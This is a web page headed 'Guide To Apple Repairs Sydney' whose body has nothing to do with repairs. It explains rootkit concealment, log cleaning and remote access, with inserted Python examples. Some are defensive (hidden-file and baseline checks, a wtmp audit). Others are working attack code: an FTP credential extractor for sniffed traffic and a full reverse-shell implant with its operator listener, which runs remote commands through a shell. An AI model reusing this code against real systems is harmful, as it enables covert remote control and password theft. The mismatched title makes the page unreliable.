Guide To Apple Repairs Sydney

Once the contamination is done and access has been obtained, the next step is to install, by means of an installation script, the objects and tools the rootkit needs, that is, the objects (programs, libraries) that set up the rootkit's payload.

Opening backdoors to control the machine, install the payload and keep access to the system is a very common technique. The rootkit tries to conceal its activity in order to minimize the risk of discovery, both to enjoy the longest possible fraudulent access and to make removal difficult. It hides its own files, other files used by the attacker, the processes it runs and its network connections.

This ability to cover its tracks distinguishes it from viruses, which primarily seek to spread, although the two functions are sometimes combined for greater effect. Several concealment methods can be combined.

Concealment of processes or files is used to hide the rootkit's activity. On Windows, this can be achieved by modifying certain registry keys. On Unix systems, the attacker can replace the ls command with a version that does not display certain files. Once in place, the rootkit can delete its own installation files so that they cannot be found by searching the disk.

Some executables or libraries are replaced with remotely controllable malware (Trojans). It is also possible to divert some activities so that apparently legitimate programs perform the functions the attacker requires.
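As an added example (not code from the original page), here are the two user-mode cases just described, a replaced ls that hides names and a swapped binary, each with the check a practitioner would run against it. The hidden-name prefix, the file names and the baseline are constructed for this demonstration:

```python
# Added example (not from the original page): two user-mode checks against
# the tricks described above, a replaced `ls` that hides names and a swapped
# binary. The hidden-name prefix, the file names and the baseline are
# constructed for this demonstration.
import hashlib
import os
import tempfile
from pathlib import Path

HIDE_PREFIX = "..."   # constructed: names the trojaned ls will suppress


def trojaned_ls(path):
    """Stand-in for a replaced `ls`: the real listing with the attacker's
    files filtered out. This is the behaviour the check below must catch."""
    return [name for name in os.listdir(path) if not name.startswith(HIDE_PREFIX)]


def hidden_entries(path, listing):
    """Cross-check what a (possibly trojaned) listing reports against a
    second view of the same directory. os.scandir() asks the kernel
    (getdents) directly, so a replaced ls binary cannot filter it. An
    LD_PRELOAD hook on readdir() would still fool it, which is why
    directory_link_count_ok() exists as a second opinion."""
    reported = set(listing(path))
    raw = {entry.name for entry in os.scandir(path)}
    return sorted(raw - reported)


def directory_link_count_ok(path):
    """On ext4/xfs/tmpfs a directory's link count is 2 + its number of
    subdirectories, so a hidden subdirectory makes the count disagree with
    the listing. Caveat: btrfs reports 1 for every directory, so True there
    is inconclusive (the check never raises a false alarm, though)."""
    st = os.stat(path)
    if st.st_nlink < 2:
        return True
    subdirs = sum(1 for e in os.scandir(path) if e.is_dir(follow_symlinks=False))
    return st.st_nlink == 2 + subdirs


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(paths):
    """Take this while the host is still trusted and store it off-host: a
    rootkit running as root can rewrite any local copy to match."""
    return {str(p): sha256_file(p) for p in paths}


def verify_baseline(baseline):
    """Return (modified, missing) paths relative to the stored baseline."""
    modified, missing = [], []
    for path, expected in baseline.items():
        if not os.path.exists(path):
            missing.append(path)
        elif sha256_file(path) != expected:
            modified.append(path)
    return modified, missing


def demo():
    """Constructed scenario in a temporary directory: one planted hidden
    file, one binary replaced after the baseline was taken, one file removed."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "ls").write_bytes(b"original ls binary (constructed)")
        (d / "notes.txt").write_bytes(b"benign file")
        (d / "...sniffer.conf").write_bytes(b"attacker config (constructed)")

        hidden = hidden_entries(d, trojaned_ls)
        baseline = build_baseline([d / "ls", d / "notes.txt"])

        (d / "ls").write_bytes(b"trojaned ls binary (constructed)")  # the swap
        (d / "notes.txt").unlink()
        modified, missing = verify_baseline(baseline)
        return {
            "hidden": hidden,
            "modified": [Path(p).name for p in modified],
            "missing": [Path(p).name for p in missing],
            "link_count_ok": directory_link_count_ok(d),
        }


if __name__ == "__main__":
    print(demo())
```

The point of the two views in hidden_entries is that the attacker has to hook every path to the directory data consistently; the link-count check adds a third view that does not go through readdir at all. The baseline check only helps if the baseline was taken before the compromise and kept where the rootkit cannot reach it.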

Obtaining higher privileges is also frequently encountered: it allows the rootkit to disable defense mechanisms (such as anti-virus software) or to act on objects that run at a high privilege level (device drivers, the kernel, etc.).

A rootkit can sniff the network for unencrypted passwords (on FTP connections, for instance) or divert an SSH connection by intercepting it on the local system at a point where the password has not yet been encrypted.
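An added example, not from the original page, of the first case: what a sniffer sees during a plaintext FTP login and how it pulls the credentials out, including when a command is split across TCP segments. The capture, host name and passwords below are constructed.

```python
# Added example (not from the original page): a sniffer-side parser that
# pulls credentials out of a plaintext FTP login, the case the text gives.
# The capture below is constructed; the host name and passwords are invented.
import re

# (direction, payload) segments in capture order: "c" client->server,
# "s" server->client. The PASS line is deliberately split across two TCP
# segments, as it often is in a real capture.
CONSTRUCTED_FTP_CAPTURE = [
    ("s", b"220 ftp.example.test FTP server ready\r\n"),
    ("c", b"USER alice\r\n"),
    ("s", b"331 Password required for alice\r\n"),
    ("c", b"PASS hun"),
    ("c", b"ter2\r\n"),
    ("s", b"230 Login successful\r\n"),
    ("c", b"SYST\r\n"),
    ("s", b"215 UNIX Type: L8\r\n"),
    ("c", b"USER bob\r\n"),
    ("s", b"331 Password required for bob\r\n"),
    ("c", b"PASS wrong-guess\r\n"),
    ("s", b"530 Login incorrect\r\n"),
]

_CMD = re.compile(r"^(USER|PASS)\s*(.*)$", re.IGNORECASE)


def extract_ftp_logins(segments):
    """Reassemble each direction's byte stream, walk it line by line and pair
    every USER/PASS with the server's verdict (230 accepted, 530 refused).
    Returns [(user, password, accepted), ...] in the order attempted."""
    buffers = {"c": b"", "s": b""}
    logins = []
    user = None
    pending = None        # (user, password) waiting for the 230/530 reply
    for direction, payload in segments:
        buffers[direction] += payload
        while b"\r\n" in buffers[direction]:
            line, buffers[direction] = buffers[direction].split(b"\r\n", 1)
            text = line.decode("latin-1")
            if direction == "c":
                m = _CMD.match(text)
                if not m:
                    continue
                verb, arg = m.group(1).upper(), m.group(2)
                if verb == "USER":
                    user = arg
                elif user is not None:          # PASS
                    pending = (user, arg)
            elif pending is not None and text[:3] in ("230", "530"):
                logins.append((pending[0], pending[1], text.startswith("230")))
                pending = None
    return logins


if __name__ == "__main__":
    for user, password, accepted in extract_ftp_logins(CONSTRUCTED_FTP_CAPTURE):
        print(f"{user}:{password} {'accepted' if accepted else 'refused'}")
```

Per-direction buffering is what makes the split PASS line harmless; the server reply is kept so that a valid credential can be told apart from a guess. The SSH case in the text is different in kind: nothing useful crosses the wire in clear, so the rootkit has to trojan the ssh client or the PAM stack on the host and record the password before it enters the encrypted channel.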

The rootkit tries not to appear in log files. To that end it erases certain log entries. It can also disable some daemons and the shell history. Finally, some rootkits can be loaded entirely into memory, leaving no trace on the machine's storage devices.
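An added example (not from the original page) of the log-cleaning part, seen from the defender's side: a parser for the Linux wtmp format that flags the zeroed records classic log cleaners leave behind and the logouts whose login has disappeared. The record layout assumed is glibc's x86_64 struct utmp; the wtmp image, user, host and times are constructed.

```python
# Added example (not from the original page): detecting the log cleaning
# described above in a Linux wtmp file. Classic cleaners overwrite the
# record for the attacker's session with zeros rather than removing it, and
# the logout (DEAD_PROCESS) belonging to a wiped login is usually left behind.
# The wtmp image below is constructed; user, host and times are invented.
import struct

# struct utmp as glibc lays it out on x86_64 Linux: 384 bytes per record.
# Other ABIs differ; check sizeof(struct utmp) before using this elsewhere.
UTMP_FMT = "<hxxi32s4s32s256shhi2i4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)          # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def make_record(ut_type, pid, line, ut_id, user, host, tv_sec):
    """Pack one utmp record (used only to build the constructed sample)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ut_id.encode(),
                       user.encode(), host.encode(),
                       0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("latin-1")


def parse_utmp(data):
    """Decode every complete record; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        raw = data[off:off + UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, raw)
        records.append({
            "type": f[0], "pid": f[1],
            "line": _cstr(f[2]), "user": _cstr(f[4]), "host": _cstr(f[5]),
            "time": f[9],
            "zeroed": raw == b"\0" * UTMP_SIZE,
        })
    return records


def audit_wtmp(data):
    """Return indices of wiped (all-zero) records and of DEAD_PROCESS records
    on a tty line with no live USER_PROCESS login before them. The second
    heuristic needs a human look: a getty respawn right after a reboot can
    also produce a logout without a login."""
    wiped, orphan_logouts = [], []
    active = set()                     # tty lines with a live USER_PROCESS
    for i, rec in enumerate(parse_utmp(data)):
        if rec["zeroed"]:
            wiped.append(i)
        elif rec["type"] == USER_PROCESS:
            active.add(rec["line"])
        elif rec["type"] == DEAD_PROCESS:
            if rec["line"] in active:
                active.discard(rec["line"])
            else:
                orphan_logouts.append(i)
    return {"wiped": wiped, "orphan_logouts": orphan_logouts}


def constructed_wtmp():
    """Four records: a normal login, the attacker's login wiped to zeros, the
    attacker's logout left behind, then the normal logout."""
    t0 = 1_700_000_000
    return b"".join([
        make_record(USER_PROCESS, 4242, "pts/0", "ts/0", "alice", "198.51.100.7", t0),
        b"\0" * UTMP_SIZE,
        make_record(DEAD_PROCESS, 4711, "pts/1", "ts/1", "", "", t0 + 600),
        make_record(DEAD_PROCESS, 4242, "pts/0", "ts/0", "", "", t0 + 900),
    ])


if __name__ == "__main__":
    print(audit_wtmp(constructed_wtmp()))
```

On a live host the same function runs over the bytes of /var/log/wtmp (the file `last` reads). Zero-filled records are the signature of cleaners that overwrite in place; cleaners that rewrite the file without the record leave no hole, and then the orphaned logout and the gap in the sequence of pids are what remains to notice.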

However, some activities cannot easily be camouflaged, particularly the payload, which generates network or CPU load; the concealment effort then goes into the communication between the rootkit and the outside.

Maintaining access

A rootkit must be operated remotely by the attacker, so it usually tries to keep a shell conveniently available at any time (or at least for the duration of the rootkit's installation), for instance by replacing commands such as ping or xterm with versions that also act as a backdoor. Generally the attacker installs several such backdoors in case one is discovered.

Remote access to the kit can be over a TCP connection such as telnet or ssh (possibly reversed, that is, the infected machine initiates the connection to the attacker), or over UDP or ICMP.
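An added example, not from the original page, of the reversed TCP case with both sides of the exchange in one script, run on localhost so that it works offline. The framing (a hostname banner, length-prefixed output, an exit line) is an assumption of this demonstration, not any particular kit's protocol.

```python
# Added example (not from the original page): the reversed TCP connection
# mentioned above, both sides in one script so the exchange can be run on
# localhost. The banner, the length-prefixed framing and the commands are
# constructed for this demonstration.
import socket
import struct
import subprocess
import threading


def implant_banner():
    return socket.gethostname()


def implant_callback(operator_host, operator_port):
    """Infected-host side. It initiates the connection outward, which is what
    gets a reverse shell past a firewall that only filters inbound traffic,
    and why defenders look for unexpected outbound connections from programs
    like a replaced ping or xterm. Each received line is run and its output
    sent back with a 4-byte big-endian length prefix, until "exit"."""
    with socket.create_connection((operator_host, operator_port), timeout=10) as s:
        s.sendall(implant_banner().encode() + b"\n")
        reader = s.makefile("rb")
        for line in reader:
            cmd = line.decode(errors="replace").strip()
            if cmd in ("", "exit"):
                break
            result = subprocess.run(cmd, shell=True, capture_output=True, timeout=30)
            payload = result.stdout + result.stderr
            s.sendall(struct.pack(">I", len(payload)) + payload)


def operator_session(commands, host="127.0.0.1"):
    """Attacker side: listen, wait for the call-back, run the commands in
    order and return (banner, [output, ...]). Port 0 means any free port."""
    server = socket.create_server((host, 0))
    server.settimeout(10)
    port = server.getsockname()[1]
    # In reality the implant runs on another machine; here it is a thread.
    worker = threading.Thread(target=implant_callback, args=(host, port), daemon=True)
    worker.start()
    conn, _peer = server.accept()
    conn.settimeout(10)
    reader = conn.makefile("rb")
    banner = reader.readline().decode(errors="replace").strip()
    outputs = []
    for cmd in commands:
        conn.sendall(cmd.encode() + b"\n")
        (length,) = struct.unpack(">I", reader.read(4))
        outputs.append(reader.read(length).decode(errors="replace"))
    conn.sendall(b"exit\n")
    worker.join(10)
    reader.close()
    conn.close()
    server.close()
    return banner, outputs


if __name__ == "__main__":
    print(operator_session(["id", "uname -a"]))
```

Length-prefixing the output is the small detail that keeps the operator from hanging when a command prints no trailing newline. On the defending side, the thing to look for is the same in either direction: a process that has no business with the network (ping, xterm, a print spooler) holding an established TCP socket to an external address.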

Chris
